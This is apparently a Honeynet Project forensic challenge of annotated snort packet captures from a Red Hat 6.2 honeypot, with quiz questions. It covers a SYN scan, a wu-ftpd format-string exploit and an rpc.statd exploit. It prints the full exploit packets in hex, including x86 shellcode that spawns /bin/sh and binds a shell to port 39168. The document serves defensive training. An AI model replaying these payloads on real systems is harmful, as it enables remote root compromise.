
##### Exploit Challenge #####

Honeynet Project, http://project.honeynet.org


Below are two exploit attacks run against our Honeynet,
specifically the system 172.16.1.104, a Linux RH 6.2
honeypot (default install). These attacks were captured
using snort, ver. 1.6.3 (www.snort.org). As you read
through these attacks, the challenge is to answer the
following questions:

QUESTION 1: Can you name the FTP scanning tool that uses a half open SYN?
QUESTION 2: What does the FTP exploit achieve? Does it open a port, create
a shell, add a user?
QUESTION 3: Where in the RPC exploit code does it bind a shell
to port 39168?
QUESTION 4: Are the two exploit attacks related?

##### Good Luck ######

### Bad guy starts off with a half open SYN scan of
### the network.
### QUESTION 1: Can you name this scanning tool?

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:27:31.019086 207.219.207.240:10101 -> 172.16.1.104:21
TCP TTL:241 TOS:0x0 ID:51721
**S***** Seq: 0x64 Ack: 0x0 Win: 0x200
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:27:31.025315 172.16.1.104:21 -> 207.219.207.240:10101
TCP TTL:63 TOS:0x0 ID:48209 DF
**S***A* Seq: 0x41C40069 Ack: 0x65 Win: 0x7FB8
TCP Options => MSS: 536
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:27:31.125575 207.219.207.240:10101 -> 172.16.1.104:21
TCP TTL:241 TOS:0x0 ID:65496
****R*** Seq: 0x65 Ack: 0x0 Win: 0x0

### Bad guy now completes a full TCP connect to the system.
### Notice how the IP and TCP header information has changed now that
### the OS and not the tool is building the packets. TTL has gone
### from 241 to 50. Looks like this guy is 14 hops away.
### Notice how with the full connect, we have TCP options and a window
### size that indicate a Linux OS.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:36.825518 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:13905 DF
**S***** Seq: 0xC331FCC5 Ack: 0x0 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 125865634 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:36.829397 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x0 ID:48210 DF
**S***A* Seq: 0xA03F7698 Ack: 0xC331FCC6 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 105623688 125865634 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:36.931933 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:13911 DF
******A* Seq: 0xC331FCC6 Ack: 0xA03F7699 Win: 0x7D78
TCP Options => NOP NOP TS: 125865645 105623688
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.159740 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x10 ID:48215 DF
*****PA* Seq: 0xA03F7699 Ack: 0xC331FCC6 Win: 0x7D78
TCP Options => NOP NOP TS: 105624021 125865645
32 32 30 20 6B 79 6C 65 20 46 54 50 20 73 65 72 220 kyle FTP ser
76 65 72 20 28 56 65 72 73 69 6F 6E 20 77 75 2D ver (Version wu-
32 2E 36 2E 30 28 31 29 20 4D 6F 6E 20 46 65 62 2.6.0(1) Mon Feb
20 32 38 20 31 30 3A 33 30 3A 33 36 20 45 53 54 28 10:30:36 EST
20 32 30 30 30 29 20 72 65 61 64 79 2E 0D 0A 2000) ready...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.271630 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:14254 DF
******A* Seq: 0xC331FCC6 Ack: 0xA03F76E8 Win: 0x7D78
TCP Options => NOP NOP TS: 125865980 105624021

### Bad guy got the header information, so he closes the connection.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.272824 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:14256 DF
***F**A* Seq: 0xC331FCC6 Ack: 0xA03F76E8 Win: 0x7D78
TCP Options => NOP NOP TS: 125865980 105624021
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.274083 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x10 ID:48216 DF
******A* Seq: 0xA03F76E8 Ack: 0xC331FCC7 Win: 0x7D78
TCP Options => NOP NOP TS: 105624032 125865980
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.274149 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x10 ID:48217 DF
*****PA* Seq: 0xA03F76E8 Ack: 0xC331FCC7 Win: 0x7D78
TCP Options => NOP NOP TS: 105624033 125865980
32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74 221 You could at
20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62 least say goodb
79 65 2E 0D 0A ye...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.277315 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x10 ID:48219 DF
***F**A* Seq: 0xA03F770D Ack: 0xC331FCC7 Win: 0x7D78
TCP Options => NOP NOP TS: 105624033 125865980
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.375292 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:241 TOS:0x10 ID:14261
****R*** Seq: 0xC331FCC7 Ack: 0x0 Win: 0x0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.386029 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:241 TOS:0x10 ID:14265
****R*** Seq: 0xC331FCC7 Ack: 0x0 Win: 0x0

### Looks like the bad guy is now done with FTP. He now moves
### on to RPC. First a UDP connection. Notice the source port
### is less than 1024, so the bad guy is root on the remote system.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:23.939896 207.219.207.240:629 -> 172.16.1.104:111
UDP TTL:50 TOS:0x0 ID:53460
Len: 64
70 01 C4 19 00 00 00 00 00 00 00 02 00 01 86 A0 p...............
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................
00 00 00 06 00 00 00 00 ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:23.942134 172.16.1.104:111 -> 207.219.207.240:629
UDP TTL:63 TOS:0x0 ID:48220
Len: 36
70 01 C4 19 00 00 00 01 00 00 00 00 00 00 00 00 p...............
00 00 00 00 00 00 00 00 00 00 03 A5 ............

### He now makes a TCP connection to port 933. Most likely a probe
### for a vulnerable RPC service. However, an RST is returned,
### indicating no service is listening.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:24.046223 207.219.207.240:630 -> 172.16.1.104:933
TCP TTL:50 TOS:0x0 ID:53461 DF
**S***** Seq: 0x33CB6C6D Ack: 0x0 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 126044347 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:24.047610 172.16.1.104:933 -> 207.219.207.240:630
TCP TTL:254 TOS:0x0 ID:48221
****R*A* Seq: 0x0 Ack: 0x33CB6C6E Win: 0x0

### Bad guy again makes a full TCP connection to FTP. This
### time he is up to something.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:27.617232 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53471 DF
**S***** Seq: 0x33BC72A2 Ack: 0x0 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 126044705 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:27.618999 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x0 ID:48222 DF
**S***A* Seq: 0x110CE78A Ack: 0x33BC72A3 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 105802758 126044705 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:27.713070 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53472 DF
******A* Seq: 0x33BC72A3 Ack: 0x110CE78B Win: 0x7D78
TCP Options => NOP NOP TS: 126044714 105802758
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:30.904850 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48227 DF
*****PA* Seq: 0x110CE78B Ack: 0x33BC72A3 Win: 0x7D78
TCP Options => NOP NOP TS: 105803086 126044714
32 32 30 20 6B 79 6C 65 20 46 54 50 20 73 65 72 220 kyle FTP ser
76 65 72 20 28 56 65 72 73 69 6F 6E 20 77 75 2D ver (Version wu-
32 2E 36 2E 30 28 31 29 20 4D 6F 6E 20 46 65 62 2.6.0(1) Mon Feb
20 32 38 20 31 30 3A 33 30 3A 33 36 20 45 53 54 28 10:30:36 EST
20 32 30 30 30 29 20 72 65 61 64 79 2E 0D 0A 2000) ready...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.017415 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53474 DF
******A* Seq: 0x33BC72A3 Ack: 0x110CE7DA Win: 0x7D78
TCP Options => NOP NOP TS: 126045045 105803086
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.018970 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53475 DF
*****PA* Seq: 0x33BC72A3 Ack: 0x110CE7DA Win: 0x7D78
TCP Options => NOP NOP TS: 126045045 105803086
55 53 45 52 20 66 74 70 0D 0A USER ftp..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.020239 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48228 DF
******A* Seq: 0x110CE7DA Ack: 0x33BC72AD Win: 0x7D78
TCP Options => NOP NOP TS: 105803098 126045045
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.025534 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48230 DF
*****PA* Seq: 0x110CE7DA Ack: 0x33BC72AD Win: 0x7D78
TCP Options => NOP NOP TS: 105803098 126045045
33 33 31 20 47 75 65 73 74 20 6C 6F 67 69 6E 20 331 Guest login
6F 6B 2C 20 73 65 6E 64 20 79 6F 75 72 20 63 6F ok, send your co
6D 70 6C 65 74 65 20 65 2D 6D 61 69 6C 20 61 64 mplete e-mail ad
64 72 65 73 73 20 61 73 20 70 61 73 73 77 6F 72 dress as passwor
64 2E 0D 0A d...
### Okay, looks like we have an attack against FTP here. But what?
### Snort detects the attack and sends the following alert.
### Dec 9 01:22:31 firewall snort[6511]: IDS287 - FTP - Wuftp260 venglin linux:
### 207.219.207.240:1882 -> 172.16.1.104:21
### This appears to be a format string attack and not a buffer overflow.
### QUESTION 2: What does this FTP exploit achieve? Does it open a port,
### create a shell, add an account?
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.167035 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53476 DF
*****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78
TCP Options => NOP NOP TS: 126045057 105803098
50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD .......1.1.1..F.
80 31 C0 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E .1.1.C..A.?...k^
31 C0 31 C9 8D 5E 01 88 46 04 66 B9 FF FF 01 B0 1.1..^..F.f.....
27 CD 80 31 C0 8D 5E 01 B0 3D CD 80 31 C0 31 DB '..1..^..=..1.1.
8D 5E 08 89 43 02 31 C9 FE C9 31 C0 8D 5E 08 B0 .^..C.1...1..^..
0C CD 80 FE C9 75 F3 31 C0 88 46 09 8D 5E 08 B0 .....u.1..F..^..
3D CD 80 FE 0E B0 30 FE C8 88 46 04 31 C0 88 46 =.....0...F.1..F
07 89 76 08 89 46 0C 89 F3 8D 4E 08 8D 56 0C B0 ..v..F....N..V..
0B CD 80 31 C0 31 DB B0 01 CD 80 E8 90 FF FF FF ...1.1..........
FF FF FF 30 62 69 6E 30 73 68 31 2E 2E 31 31 76 ...0bin0sh1..11v
65 6E 67 6C 69 6E 40 6B 6F 63 68 61 6D 2E 6B 61 englin@kocham.ka
73 69 65 2E 63 6F 6D 0D 0A sie.com..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48231 DF
*****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78
TCP Options => NOP NOP TS: 105803113 126045057
35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login incorr
65 63 74 2E 0D 0A ect...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.285312 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53477 DF
******A* Seq: 0x33BC7446 Ack: 0x110CE834 Win: 0x7D78
TCP Options => NOP NOP TS: 126045072 105803113
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.876754 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53479 DF
***F**A* Seq: 0x33BC7446 Ack: 0x110CE834 Win: 0x7D78
TCP Options => NOP NOP TS: 126045931 105803113
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.878137 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48232 DF
******A* Seq: 0x110CE834 Ack: 0x33BC7447 Win: 0x7D78
TCP Options => NOP NOP TS: 105803984 126045931
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.878150 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48233 DF
*****PA* Seq: 0x110CE834 Ack: 0x33BC7447 Win: 0x7D78
TCP Options => NOP NOP TS: 105803984 126045931
32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74 221 You could at
20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62 least say goodb
79 65 2E 0D 0A ye...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.880154 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48234 DF
***F**A* Seq: 0x110CE859 Ack: 0x33BC7447 Win: 0x7D78
TCP Options => NOP NOP TS: 105803984 126045931
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.979538 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:241 TOS:0x10 ID:53481
****R*** Seq: 0x33BC7447 Ack: 0x0 Win: 0x0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.983316 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:241 TOS:0x10 ID:53482
****R*** Seq: 0x33BC7447 Ack: 0x0 Win: 0x0
### The FTP attack is all done.

### Six hours later a new attack. Is it the same person coming
### from a different IP address, or is this unrelated? The bad
### guy starts off with an RPC probe.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:10.138117 207.19.5.25:709 -> 172.16.1.104:111
UDP TTL:49 TOS:0x0 ID:48624
Len: 64
2F 99 8C 57 00 00 00 00 00 00 00 02 00 01 86 A0 /..W............
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................
00 00 00 11 00 00 00 00 ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:10.144426 172.16.1.104:111 -> 207.19.5.25:709
UDP TTL:63 TOS:0x0 ID:48239
Len: 36
2F 99 8C 57 00 00 00 01 00 00 00 00 00 00 00 00 /..W............
00 00 00 00 00 00 00 00 00 00 03 A3 ............

### He finds a vulnerability and immediately launches into an
### RPC exploit. This exploit appears to create a /bin/sh listening on
### port 39168. He immediately connects to this port after the
### exploit. Snort detected the attack and sent the following alert.
### Dec 9 07:17:10 firewall snort[6511]: IDS362 - MISC - Shellcode X86 NOPS-UDP:
### 207.19.5.25:710 -> 172.16.1.104:931
### QUESTION 3: Where in the exploit code below does he bind a shell
### to port 39168?
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:10.595325 207.19.5.25:710 -> 172.16.1.104:931
UDP TTL:49 TOS:0x0 ID:48712
Len: 1084
0C 72 54 F5 00 00 00 00 00 00 00 02 00 01 86 B8 .rT.............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ...............
3A 32 3F ED 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :2?.....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................
18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................
1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1
33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x
25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n..............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N.............
FF FF FF 00 ....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:12.552539 207.19.5.25:710 -> 172.16.1.104:931
UDP TTL:49 TOS:0x0 ID:48941
Len: 1084
0C 72 54 F5 00 00 00 00 00 00 00 02 00 01 86 B8 .rT.............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ...............
3A 32 3F ED 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :2?.....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................
18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................
1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1
33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x
25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n..............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
